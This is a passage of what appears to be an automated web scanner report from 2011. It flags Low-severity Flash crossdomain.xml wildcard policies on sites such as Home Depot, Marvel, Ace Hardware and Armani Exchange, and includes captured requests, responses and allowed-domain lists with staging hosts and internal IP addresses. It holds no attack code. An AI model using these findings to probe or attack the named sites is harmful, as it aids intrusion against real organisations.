<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.70. https://secure.homedepot.ca/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.homedepot.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.homedepot.ca

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 31 Jan 2011 07:35:35 GMT
Content-Type: text/xml
Date: Mon, 16 May 2011 02:10:40 GMT
Content-Length: 339
Connection: close
Cache-Control: max-age=315360000
Expires: Wed, 12 May 2021 22:48:47 GMT

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.homedepot.ca" />    <allow-access-from domain="*.startaconversation.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

6.71. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Mon, 16 May 2011 10:34:08 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.72. http://subscriptions.marvel.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://subscriptions.marvel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: subscriptions.marvel.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:32 GMT
Server: Apache
Vary: Accept-Encoding
X-ServerNickName: Venom
Content-Length: 417
Connection: close
Content-Type: text/x-cross-domain-policy; charset=utf-8

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.marvel.com" h
...[SNIP]...
<allow-access-from domain="i.annihil.us" />
<allow-access-from domain="*.marvel.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...

6.73. https://subscriptions.marvel.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://subscriptions.marvel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: subscriptions.marvel.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:24 GMT
Server: Apache
Vary: Accept-Encoding
X-ServerNickName: Cap
Content-Length: 417
Connection: close
Content-Type: text/x-cross-domain-policy; charset=utf-8

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.marvel.com" h
...[SNIP]...
<allow-access-from domain="i.annihil.us" />
<allow-access-from domain="*.marvel.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...

6.74. http://www.acehardware.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:36 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 698
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:54:36 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="ace.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.75. https://www.acehardware.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:28 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 698
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:12:28 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="ace.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.76. http://www.armaniexchange.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.armaniexchange.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.armaniexchange.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:43 GMT
ETag: "206-a0b786c0"
Content-Type: application/xml
Cache-Control: max-age=600
Expires: Mon, 16 May 2011 02:05:22 GMT
Date: Mon, 16 May 2011 01:55:22 GMT
Content-Length: 518
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.overlay.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ax-life.com" />
<allow-access-from domain="ii.armaniexchange.com" />
<allow-access-from domain="ii.marketlive.com" />
<allow-access-from domain=" origin-ii-prod-rw.marketlive.com" />
<allow-access-from domain="ii1-rev-rw.marketlive.com" />
...[SNIP]...

6.77. https://www.armaniexchange.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.armaniexchange.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.armaniexchange.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:43 GMT
ETag: "206-a0b786c0"
Content-Type: application/xml
Cache-Control: max-age=600
Expires: Mon, 16 May 2011 02:23:16 GMT
Date: Mon, 16 May 2011 02:13:16 GMT
Content-Length: 518
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.overlay.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ax-life.com" />
<allow-access-from domain="ii.armaniexchange.com" />
<allow-access-from domain="ii.marketlive.com" />
<allow-access-from domain=" origin-ii-prod-rw.marketlive.com" />
<allow-access-from domain="ii1-rev-rw.marketlive.com" />
...[SNIP]...

6.78. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
